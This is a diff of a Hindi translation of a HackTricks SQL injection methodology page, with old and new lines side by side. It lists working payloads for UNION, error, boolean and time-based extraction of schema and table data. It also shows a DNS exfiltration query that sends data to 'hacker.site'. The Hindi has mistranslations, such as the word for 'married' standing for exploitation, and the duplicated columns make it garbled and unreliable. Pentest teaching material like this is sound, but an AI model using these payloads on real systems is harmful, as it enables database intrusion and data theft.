* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **या** मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके। * **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके।
</details> </details>

View file

@ -4,28 +4,28 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**।
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके**
</details> </details>
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure> <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफान मिलने का समारोह है। [**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और **यूरोप** में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह सम्मेलन प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उबाऊ मिलन स्थल है।
{% embed url="https://www.rootedcon.com/" %} {% embed url="https://www.rootedcon.com/" %}
## SQL Injection क्या है? ## SQL injection क्या है?
**SQL इंजेक्शन** एक सुरक्षा दोष है जो हमलावदियों को एक एप्लिकेशन के डेटाबेस क्वेरी में **हस्तक्षेप करने** की अनुमति देता है। यह कमजोरी हमलावदियों को अनुमति देती है कि वे उन डेटा को **देखें**, **संशोधित करें**, या **हटाएं** जिनका उन्हें पहुंचना नहीं चाहिए, जिसमें अन्य उपयोगकर्ताओं की जानकारी या ऐसे किसी भी डेटा शामिल हो सकता है जिसका एप्लिकेशन उपयोग कर सकता है। ऐसे कार्रवाई एप्लिकेशन के कार्यान्वयन या सामग्री में स्थायी परिवर्तन या सर्वर का संक्रमण या सेवा की नकारात्मक परिणाम में भी हो सकती है। **SQL injection** एक सुरक्षा दोष है जो हमलावधारकों को एक एप्लिकेशन के डेटाबेस क्वेरी में **हस्तक्षेप करने** की अनुमति देता है। यह कमजोरी हमलावधारकों को अनुमति देती है कि वे उन डेटा को **देखें**, **संशोधित करें**, या **हटाएं** जिनका उन्हें पहुंचना नहीं चाहिए, जिसमें अन्य उपयोगकर्ताओं की जानकारी या ऐसे किसी भी डेटा शामिल हो सकता है जिसका एप्लिकेशन पहुंच सकता है। ऐसे कार्रवाई एप्लिकेशन के कार्यान्वयन या सामग्री में स्थायी परिवर्तन या सर्वर का संक्रमण या सेवा की नापसंदी का परिणाम हो सकता है।
## प्रवेश बिंदु का पता लगाना ## प्रवेश बिंदु का पता लगाना
जब एक साइट **SQL इंजेक्शन (SQLi)** के लिए वंशावली होने के लिए असामान्य सर्वर प्रतिक्रियाएं दिखाती है, तो **पहला कदम** यह है कि बिना इसे व्यवस्थित करने के **क्वेरी में डेटा इंजेक्ट करने का तरीका समझें**। इसके लिए मौजूदा संदर्भ से **निकलने का तरीका** पहचानना आवश्यक है। ये कुछ उपयोगी उदाहरण हैं: जब एक साइट **SQL injection (SQLi)** के लिए **वंशावली** दिखाती है क्योंकि असामान्य सर्वर प्रतिक्रियाएँ SQLi संबंधित इनपुट्स के लिए, **पहला कदम** यह है कि समझें कि वर्तमान संदर्भ से डेटा कैसे **क्वेरी में डाला जा सकता है बिना इसे बिगाड़े**। इसके लिए वर्तमान संदर्भ से **निकलने की विधि** को पहचानना आवश्यक है। ये कुछ उपयोगी उदाहरण हैं:
``` ```
[Nothing] [Nothing]
' '
@ -38,7 +38,7 @@
")) "))
`)) `))
``` ```
तो, आपको यह जानना चाहिए कि **क्वेरी में त्रुटियाँ न हों**। क्वेरी को ठीक करने के लिए आप **डेटा इनपुट** कर सकते हैं ताकि **पिछली क्वेरी नए डेटा को स्वीकार करे**, या फिर आप अपने डेटा को **इनपुट** कर सकते हैं और **एक कमेंट सिम्बल को अंत में जोड़ सकते हैं**। तो, आपको यह जानना चाहिए कि **क्वेरी में त्रुटियाँ न हों**। क्वेरी को ठीक करने के लिए आप **इनपुट** डेटा दे सकते हैं ताकि **पिछली क्वेरी नए डेटा को स्वीकार करे**, या फिर आप अपने डेटा को **इनपुट** कर सकते हैं और **एक टिप्पणी प्रतीक को अंत में जोड़ सकते हैं**।
_ध्यान दें कि अगर आप त्रुटि संदेश देख सकते हैं या जब क्वेरी काम कर रही है और जब नहीं तो इस चरण को अधिक आसान होगा।_ _ध्यान दें कि अगर आप त्रुटि संदेश देख सकते हैं या जब क्वेरी काम कर रही है और जब नहीं तो इस चरण को अधिक आसान होगा।_
@ -68,11 +68,11 @@ SQLite
HQL HQL
HQL does not support comments HQL does not support comments
``` ```
### तार्किक परिचय की पुष्टि ### तार्किक परिचय करना
एक SQL इन्जेक्शन संवेदनशीलता की पुष्टि करने का एक विश्वसनीय तरीका **तार्किक कार्य** को क्रियान्वित करना है और अपेक्षित परिणामों का अवलोकन करना। उदाहरण के लिए, एक GET पैरामीटर जैसे `?username=Peter` जब `?username=Peter' या '1'='1` में संशोधित किया जाता है और वास्तविक सामग्री उत्पन्न होती है, तो यह एक SQL इन्जेक्शन संवेदनशीलता का संकेत है। एक SQL इन्जेक्शन व्यवस्थितता की पुष्टि करने के लिए एक **तार्किक कार्य** को निष्पादित करके अपेक्षित परिणामों का अवलोकन करने क एक विश्वसनीय तरीका है। उदाहरण के लिए, एक GET पैरामीटर जैसे `?username=Peter` जब `?username=Peter' या '1'='1` में संशोधित किया जाता है और यह एक ही सामग्री प्रदान करता है, तो यह एक SQL इन्जेक्शन व्यवस्थितता का संकेत है।
सी तरह, **गणितीय कार्यों** का अनुप्रयोग एक प्रभावी पुष्टि तकनीक के रूप में काम करता है। उदाहरण के लिए, यदि `?id=1` और `?id=2-1` तक पहुँचने पर समान परिणाम प्राप्त होता है, तो यह SQL इन्जेक्शन का संकेत है। सी तरह, **गणितीय कार्यों** का अनुप्रयोग एक प्रभावी पुष्टि तकनीक के रूप में काम करता है। उदाहरण के लिए, अगर `?id=1` और `?id=2-1` तक पहुँचने पर समान परिणाम प्रकट होते हैं, तो यह SQL इन्जेक्शन का संकेत है।
तार्किक कार्य की पुष्टि करने वाले उदाहरण: तार्किक कार्य की पुष्टि करने वाले उदाहरण:
``` ```
@ -81,14 +81,14 @@ page.asp?id=1' or 1=1 -- results in true
page.asp?id=1" or 1=1 -- results in true page.asp?id=1" or 1=1 -- results in true
page.asp?id=1 and 1=2 -- results in false page.asp?id=1 and 1=2 -- results in false
``` ```
यह शब्द-सूची निम्नलिखित तरीके से **SQL इंजेक्शन की पुष्टि** करने के लिए बनाई गई थी: यह शब्द-सूची बनाई गई थी ताकि प्रस्तावित तरीके से **SQL इन्जेक्शन की पुष्टि** की जा सके:
{% file src="../../.gitbook/assets/sqli-logic.txt" %} {% file src="../../.gitbook/assets/sqli-logic.txt" %}
### समय की पुष्टि करना ### समय की पुष्टि करना
कुछ मामलों में आपको यह नहीं पता चलेगा कि आप जिस पृष्ठ का परीक्षण कर रहे हैं, उस पर कोई भी परिवर्तन हुआ है। इसलिए, **ब्लाइंड SQL इंजेक्शन** का पता लगाने का एक अच्छा तरीका है कि डेटाबेस को कार्रवाई करने के लिए बनाए जाएंगे और पृष्ठ को लोड करने में समय पर **प्रभाव होगा**।\ कुछ मामलों में आपको यह नहीं पता चलेगा कि आप जिस पृष्ठ का परीक्षण कर रहे हैं, उसमें कोई परिवर्तन हुआ है। इसलिए, **ब्लाइंड SQL इन्जेक्शन का पता लगाने** का एक अच्छा तरीका है कि डेटाबेस को कार्रवाई करने के लिए बनाए और पृष्ठ को लोड करने में समय का **प्रभाव होगा**।\
इसलिए, हम SQL क्वेरी में एक ऑपरेशन को जो पूरा होने में बहुत समय लेगा, जोड़ने जा रहे हैं: इसलिए, हम SQL क्वेरी में एक ऑपरेशन को जोड़ने जा रहे हैं जो पूरा होने में बहुत समय लेगा:
``` ```
MySQL (string concat and logical ops) MySQL (string concat and logical ops)
1' + sleep(10) 1' + sleep(10)
@ -110,11 +110,11 @@ SQLite
1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) 1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) 1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
``` ```
कई मामलों में **नींद फ़ंक्शनों की अनुमति नहीं होगी**। तब, इन फ़ंक्शनों का उपयोग करने की बजाय आप क्वेरी को **जटिल कार्य** करने के लिए कर सकते हैं जो कई सेकंड लेगा। _इन तकनीकों के उदाहरणों को प्रत्येक प्रौद्योगिकी पर अलग-अलग टिप्पणी किया जाएगा_। कई मामलों में **नींद फ़ंक्शनों की अनुमति नहीं होगी**। तब, इन फ़ंक्शनों का उपयोग करने की बजाय आप क्वेरी को **जटिल कार्य** करने के लिए कर सकते हैं जो कई सेकंड लेगा। _इन तकनीकों के उदाहरणों को अलग-अलग प्रौद्योगिकियों पर टिप्पणी के रूप में दिया जाएगा।_
### पीछे-एंड की पहचान ### बैक-एंड की पहचान
पीछे-एंड की पहचान करने का सबसे अच्छा तरीका विभिन्न पीछे-एंड के फ़ंक्शनों को क्रियान्वित करने की कोशिश करना है। आप पिछले खंड के _**नींद**_ **फ़ंक्शन** या इन्हें उपयोग कर सकते हैं (टेबल [payloadsallthethings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#dbms-identification) से): बैक-एंड की पहचान करने का सबसे अच्छा तरीका विभिन्न बैक-एंड के फ़ंक्शनों को क्रियान्वित करने की कोशिश करना है। आप पिछले खंड के _**नींद**_ **फ़ंक्शन** या इन्हें उपयोग कर सकते हैं (टेबल [payloadsallthethings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#dbms-identification) से):
```bash ```bash
["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"], ["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"],
["connection_id()=connection_id()" ,"MYSQL"], ["connection_id()=connection_id()" ,"MYSQL"],
@ -145,24 +145,24 @@ SQLite
यदि आपके पास क्वेरी के आउटपुट तक पहुंच है, तो आप डेटाबेस के संस्करण को प्रिंट कर सकते हैं। यदि आपके पास क्वेरी के आउटपुट तक पहुंच है, तो आप डेटाबेस के संस्करण को प्रिंट कर सकते हैं।
{% hint style="info" %} {% hint style="info" %}
एक सततीकरण के लिए हम विभिन्न प्रकार की SQL Injection को शादीशुदा करने के विभिन्न तरीकों पर चर्चा करेंगे। हम MySQL का उदाहरण लेंगे। एक सतति जिसमें हम विभिन्न प्रकार की SQL Injection का उपयोग करने के विभिन्न तरीके पर चर्चा करेंगे। हम MySQL का उदाहरण लेंगे।
{% endhint %} {% endhint %}
### पोर्टस्विगर के साथ पहचान ### पोर्टस्विगर के साथ पहचान
{% embed url="https://portswigger.net/web-security/sql-injection/cheat-sheet" %} {% embed url="https://portswigger.net/web-security/sql-injection/cheat-sheet" %}
## यूनियन आधारित शादीशुदा ## Union Based का शोधन
### स्तंभों की संख्या का पता लगाना ### स्तंभों की संख्या का पता लगाना
यदि आप क्वेरी के आउटपुट देख सकते हैं तो इसे शादीशुदा करने का सबसे अच्छा तरीका है।\ यदि आप क्वेरी के आउटपुट देख सकते हैं तो इसे उसका शोधन करने का सबसे अच्छा तरीका है।\
सबसे पहले, हमें यह जानना है कि **प्रारंभिक अनुरोध** कितने **स्तंभ** लौटा रहा है। यह इसलिए है कि **दोनों क्वेरी को समान संख्या में स्तंभ लौटाना चाहिए**।\ सबसे पहले, हमें यह जानने की आवश्यकता है कि **प्रारंभिक अनुरोध** कितने **स्तंभ** वापस कर रहा है। यह इसलिए है क्योंकि **दोनों क्वेरी कोलम्न की संख्या वापस करनी चाहिए**।\
इस उद्देश्य के लिए आम तौर पर दो विधियां प्रयोग की जाती हैं: इस उद्देश्य के लिए दो विधियां सामान्यत: उपयोग की जाती हैं:
#### क्रम/समूह द्वारा #### क्रम/समूह द्वारा
क्वेरी में स्तंभों की संख्या निर्धारित करने के लिए, **ORDER BY** या **GROUP BY** शर्तों में उपयोग किए गए संख्या को धारात्मक रूप से समायोजित करें जब तक एक गलत प्रतिक्रिया प्राप्त न हो जाए। SQL के भीतर **GROUP BY** और **ORDER BY**ी विशिष्ट कार्यक्षमताओं के बावजूद, दोनों क्वेरी के स्तंभों की संख्या का निर्धारण करने के लिए इस्तेमाल किया जा सकता है। क्वेरी में स्तंभों की संख्या निर्धारित करने के लिए, **ORDER BY** या **GROUP BY** शर्तों में उपयोग किए गए संख्या को धारात्मक रूप से समायोजित करें जब तक एक गलत प्रतिक्रिया प्राप्त न हो जाए। SQL के भीतर **GROUP BY** और **ORDER BY**े विभिन्न कार्यों के बावजूद, दोनों क्वेरी के स्तंभों की संख्या का निर्धारण करने के लिए इनका उपयोग एकसमान रूप से किया जा सकता है।
```sql ```sql
1' ORDER BY 1--+ #True 1' ORDER BY 1--+ #True
1' ORDER BY 2--+ #True 1' ORDER BY 2--+ #True
@ -186,11 +186,11 @@ SQLite
1' UNION SELECT null,null-- - Not working 1' UNION SELECT null,null-- - Not working
1' UNION SELECT null,null,null-- - Worked 1' UNION SELECT null,null,null-- - Worked
``` ```
_आपको कई मामलों में `null` मान का उपयोग करना चाहिए क्योंकि कुछ मामलों में क्वेरी के दोनों ओर कॉलम का प्रकार समान होना चाहिए और हर मामले में `null` मान मान्य है।_ _आपको कई मामलों में `null` मान का उपयोग करना चाहिए क्योंकि कुछ मामलों में क्वेरी के दोनों ओर की स्तंभों के प्रकार समान होना चाहिए और हर मामले में `null` मान मान्य है।_
### डेटाबेस नाम, तालिका नाम और कॉलम नाम निकालें ### डेटाबेस नाम, तालिका नाम और स्तंभ नामों को निकालें
अगले उदाहरणों में हम सभी डेटाबेस का नाम, एक डेटाबेस की तालिका का नाम, तालिका के कॉलम नाम प्राप्त करेंगे: अगले उदाहरणों में हम सभी डेटाबेस का नाम, एक डेटाबेस की तालिका का नाम, तालिका के स्तंभ नामों को पुनः प्राप्त करने जा रहे हैं:
```sql ```sql
#Database names #Database names
-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata -1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata
@ -203,51 +203,51 @@ _आपको कई मामलों में `null` मान का उप
``` ```
_हर विभिन्न डेटाबेस पर इस डेटा को खोजने के लिए एक विभिन्न तरीका है, लेकिन यह हमेशा एक ही मेथडोलॉजी होती है।_ _हर विभिन्न डेटाबेस पर इस डेटा को खोजने के लिए एक विभिन्न तरीका है, लेकिन यह हमेशा एक ही मेथडोलॉजी होती है।_
## छिपी हयूनियन आधारित शोध ## छिपी हुई यूनियन आधारित शोध
जब क्वेरी का आउटपुट दिखाई देता है, लेकिन एक यूनियन-आधारित इन्जेक्शन संभावनाशून्य लगता है, तो इसका मतलब है कि एक **छिपी यूनियन-आधारित इन्जेक्शन** की मौजूदगी है। यह परिदृश्य अक्सर एक अंधा इन्जेक्शन स्थिति की ओर ले जाता है। एक अंधा इन्जेक्शन को यूनियन-आधारित में बदलने के लिए, बैकएंड पर निष्क्रिय क्वेरी को समझना आवश्यक है। जब क्वेरी का आउटपुट दिखाई देता है, लेकिन यूनियन आधारित इन्जेक्शन संभावनाशील नहीं लगता है, तो इसका मतलब है कि एक **छिपी हुई यूनियन आधारित इन्जेक्शन** मौजूद है। यह परिदृश्य अक्सर एक अंधा इन्जेक्शन स्थिति की ओर ले जाता है। एक अंधा इन्जेक्शन को यूनियन आधारित में बदलने के लिए, बैकएंड पर निष्क्रिय क्वेरी को समझना आवश्यक है।
इसे आपके लक्ष्य डेटाबेस प्रबंधन सिस्टम (DBMS) के डिफ़ॉल्ट तालिकाओं के साथ अंधा इन्जेक्शन तकनीकों का उपयोग करके प्राप्त किया जा सकता है। इन डिफ़ॉल्ट तालिकाओं को समझने के लिए, लक्ष्य DBMS की दस्तावेज़ीकरण पर परामर्श दिया जाता है। इसे आपके लक्ष्य डेटाबेस प्रबंधन सिस्टम (DBMS) के डिफ़ॉल्ट तालिकाओं के साथ अंधा इन्जेक्शन तकनीकों का उपयोग करके प्राप्त किया जा सकता है। इन डिफ़ॉल्ट तालिकाओं को समझने के लिए, लक्ष्य DBMS की दस्तावेज़ीकरण पर सलाह दी जाती है।
क्वेरी को निकालने के बाद, मूल क्वेरी को सुरक्षित रूप से बंद करने के लिए अपने पेलोड को अनुकूलित करना आवश्यक है। इसके बाद, अपने पेलोड में एक यूनियन क्वेरी जोड़ी जाती है, जिससे नए पहुंचने वाले यूनियन-आधारित इन्जेक्शन का शोधन सुविधा प्राप्त होती है। एक बार क्वेरी निकाल ली गई है, मूल क्वेरी को सुरक्षित रूप से बंद करने के लिए अपने पेलोड को अनुकूलित करना आवश्यक है। इसके बाद, अपने पेलोड में एक यूनियन क्वेरी जोड़ी जाती है, जिससे नए पहुंचने वाले यूनियन आधारित इन्जेक्शन का शोषण सुविधा प्रदान की जाती है।
अधिक व्यापक अनुभव के लिए, [हीलिंग ब्लाइंड इन्जेक्शन](https://medium.com/@Rend_/healing-blind-injections-df30b9e0e06f) पर उपलब्ध पूरे लेख का संदर्भ देखें। अधिक व्यापक अनुभव के लिए, [Healing Blind Injections](https://medium.com/@Rend_/healing-blind-injections-df30b9e0e06f) पर उपलब्ध पूरे लेख का संदर्भ देखें।
## त्रुटि आधारित शोध ## त्रुटि आधारित शोध
यदि किसी कारणवश आप **क्वेरी** का **आउटपुट** नहीं देख सकते हैं, लेकिन आप **त्रुटि संदेश** देख सकते हैं, तो आप इस त्रुटि संदेश का उपयोग करके डेटाबेस से डेटा को **बाहर निकाल** सकते हैं।\ यदि किसी कारणवश आप **क्वेरी** का **आउटपुट** नहीं देख सकते हैं, लेकिन आप **त्रुटि संदेश** देख सकते हैं, तो आप इस त्रुटि संदेश का उपयोग करके डेटाबेस से डेटा को **बाहर निकाल** सकते हैं।\
यूनियन आधारित शोधन में एक ही फ्लो का पालन करते हुए आप डेटाबेस को डंप कर सकते हैं। यूनियन आधारित शोधन में एक ही फ्लो का पालन करते हुए आप डीबी डंप कर सकते हैं।
```sql ```sql
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
``` ```
## ब्लाइंड SQLi का शोषण ## ब्लाइंड SQLi का शोषण
इस मामले में आप क्वेरी या त्रुटियों के परिणाम नहीं देख सकते हैं, लेकिन आप यह पहचान सकते हैं कि क्वेरी एक सच्चा या एक गलत प्रतिक्रिया वापस करती है क्योंकि पृष्ठ पर विभिन्न सामग्री है।\ इस मामले में आप क्वेरी के परिणाम या त्रुटियों को नहीं देख सकते हैं, लेकिन आप यह पहचान सकते हैं कि क्वेरी एक सच्चा या एक गलत प्रतिक्रिया कब वापस करती है क्योंकि पृष्ठ पर विभिन्न सामग्री होती है।\
इस मामले में, आप उस व्यवहार का दुरुपयोग कर सकते हैं ताकि डेटाबेस को चार चार करने के लिए: इस मामले में, आप उस व्यवहार का दुरुपयोग कर सकते हैं ताकि डेटाबेस को एक चरित्र से दंप कर सकें:
```sql ```sql
?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A' ?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A'
``` ```
## त्रुटि अंध SQLi का शोषण ## त्रुटि अंधा SQLi का शोधन
यह **पहले जैसा मामला है** लेकिन पूछे गए प्रश्न से सच/झूठ का अंतर करने की बजाय आप एसक्यूएल क्वेरी में त्रुटि का अंतर कर सकते हैं या नहीं (शायद इसलिए क्योंकि एचटीटीपी सर्वर क्रैश हो जाता है)। इसलिए, इस मामले में आप प्रत्येक बार जब आप सही ढंग से अक्षर का अनुमान लगाते हैं तो एसक्यूएल त्रुटि को मजबूर कर सकते हैं: यह **पहले जैसा मामला है** लेकिन पूछे गए प्रश्न से सच/झूठ का अंतर करने की बजाय आप SQL प्रश्न में त्रुटि का अंतर कर सकते हैं या नहीं (शायद HTTP सर्वर क्रैश हो जाए)। इसलिए, इस मामले में आप प्रत्येक बार सही ढंग से अक्षर का अनुमान लगाते समय एक SQL त्रुटि को मजबूर कर सकते हैं:
```sql ```sql
AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- - AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
``` ```
## Time Based SQLi का शोषण ## Time Based SQLi का शोषण
इस मामले में किसी भी तरह से क्वेरी के प्रतिक्रिया को पृष्ठ के संदर्भ पर भिन्न करने का कोई तरीका **नहीं** है। लेकिन, यदि अनुमानित वर्ण सही है तो पृष्ठ को **लोड होने में अधिक समय** लगा सकते हैं। हम पहले ही इस तकनीक का उपयोग करके [एक SQLi सुरक्षा दोष की पुष्टि](./#confirming-with-timing) करने के लिए देख चुके हैं इस मामले में किसी भी तरह से क्वेरी के प्रतिक्रिया को पृष्ठ के संदर्भ पर भिन्न करने का कोई तरीका नहीं है। लेकिन, यदि अनुमानित वर्ण सही है तो पृष्ठ को लोड करने में अधिक समय लगा सकते हैं। हम पहले ही इस तकनीक का उपयोग करते हुए देख चुके हैं ताकि [एक SQLi vuln की पुष्टि की जा सके](./#confirming-with-timing)
```sql ```sql
1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')# 1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')#
``` ```
## Stacked Queries ## Stacked Queries
आप स्टैक्ड क्वेरीज़ का उपयोग करके **कई क्वेरीज़ों को लगातार निष्पादित** कर सकते हैं। ध्यान दें कि जब भीतर के क्वेरीज़ निष्पादित होते हैं, **परिणाम** **एप्लिकेशन को वापस नहीं भेजे जाते**। इसलिए यह तकनीक मुख्य रूप से **ब्लाइंड वंशांकन** के संबंध में उपयोगी है जहाँ आप एक दूसरी क्वेरी का उपयोग करके DNS लुकअप, शर्तमुक्त त्रुटि, या समय देरी को ट्रिगर कर सकते हैं। आप स्टैक्ड क्वेरीज़ का उपयोग करके **कई क्वेरीज़ों को लगातार निष्पादित** कर सकते हैं। ध्यान दें कि जब आगामी क्वेरीज़ निष्पादित होती हैं, तो **परिणाम** **एप्लिकेशन को वापस नहीं भेजे जाते**। इसलिए यह तकनीक मुख्य रूप से **ब्लाइंड वंशावली** के संदर्भ में उपयोगी है जहाँ आप एक दूसरी क्वेरी का उपयोग करके DNS लुकअप, शर्तमुक्त त्रुटि, या समय देरी को ट्रिगर कर सकते हैं।
**Oracle** स्टैक्ड क्वेरीज़ का समर्थन नहीं करता है। **MySQL, Microsoft** और **PostgreSQL** इन्हें समर्थन करते हैं: `QUERY-1-HERE; QUERY-2-HERE` **Oracle** स्टैक्ड क्वेरीज़ का समर्थन नहीं करता है। **MySQL, Microsoft** और **PostgreSQL** इन्हें समर्थन करते हैं: `QUERY-1-HERE; QUERY-2-HERE`
## Out of band Exploitation ## Out of band Exploitation
अगर **कोई अन्य** उत्पीड़न विधि **काम नहीं करती** है, तो आप डेटाबेस से जानकारी को आपके द्वारा नियंत्रित बाह्य होस्ट पर भेजने का प्रयास कर सकते हैं। उदाहरण के लिए, DNS क्वेरीज़ के माध्यम से: अगर **कोई अन्य** उत्पीड़न विधि **काम नहीं करती** है, तो आप डेटाबेस से जानकारी को आपके द्वारा नियंत्रित बाह्य होस्ट पर निकालने का प्रयास कर सकते हैं। उदाहरण के लिए, DNS क्वेरीज़ के माध्यम से:
```sql ```sql
select load_file(concat('\\\\',version(),'.hacker.site\\a.txt')); select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
``` ```
@ -261,7 +261,7 @@ a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DO
## तकनीक विशिष्ट जानकारी ## तकनीक विशिष्ट जानकारी
हमने पहले ही एक SQL Injection सुरक्षा दोष को शोधन करने के सभी तरीके चर्चा की है। इस पुस्तक में डेटाबेस प्रौद्योगिकी के निर्भर अधिक ट्रिक्स खोजें: हमने पहले ही एक SQL Injection सुरक्षा दोष को शोधन करने के सभी तरीके की चर्चा की है। इस पुस्तक में डेटाबेस प्रौद्योगिकी पर निर्भर कुछ और ट्रिक्स मिलेंगे:
* [MS Access](ms-access-sql-injection.md) * [MS Access](ms-access-sql-injection.md)
* [MSSQL](mssql-injection.md) * [MSSQL](mssql-injection.md)
@ -269,11 +269,11 @@ a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DO
* [Oracle](oracle-injection.md) * [Oracle](oracle-injection.md)
* [PostgreSQL](postgresql-injection/) * [PostgreSQL](postgresql-injection/)
